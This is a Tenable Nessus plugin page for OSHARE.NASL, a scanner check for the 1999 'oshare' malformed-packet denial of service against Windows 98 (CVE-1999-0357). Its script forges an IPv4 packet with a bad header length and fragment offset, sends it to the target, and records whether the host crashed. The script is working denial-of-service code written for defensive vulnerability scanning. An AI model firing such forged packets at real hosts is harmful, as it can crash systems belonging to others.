Lucene search

K
nessusThis script is Copyright (C) 1999-2019 Tenable Network Security, Inc.OSHARE.NASL
HistoryJul 29, 1999 - 12:00 a.m.

Microsoft Windows 98 Malformed oshare Packet DoS

1999-07-2900:00:00
This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
www.tenable.com
44

It was possible to crash the remote system using the β€˜oshare’ attack.

An attacker may use this problem to prevent your site from working properly.

#
# (C) Tenable Network Security, Inc.
#

# This attack is very unlikely to work from a large number
# of systems which check ip->ip_len before sending the packets.
#

include("compat.inc");

if (description)
{
 script_id(10170);
 script_version("1.26");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0357");

 script_name(english:"Microsoft Windows 98 Malformed oshare Packet DoS");
 script_summary(english:"Crashes the remote host using the 'oshare' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote system using the 'oshare' attack.

An attacker may use this problem to prevent your site from working
properly.");
 script_set_attribute(attribute:"solution", value:"Contact your vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/01/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/07/29");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
ip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,
		     ip_tos : 0, ip_id : rand(), ip_off : 16383,
		     ip_ttl : 0xFF, ip_p : IPPROTO_UDP,
		     ip_src : compat::this_host());

start_denial();
send_packet(ip, pcap_active:FALSE);

alive = end_denial();
if(!alive){
		security_hole(0);
		set_kb_item(name:"Host/dead", value:TRUE);
	  }

Related for OSHARE.NASL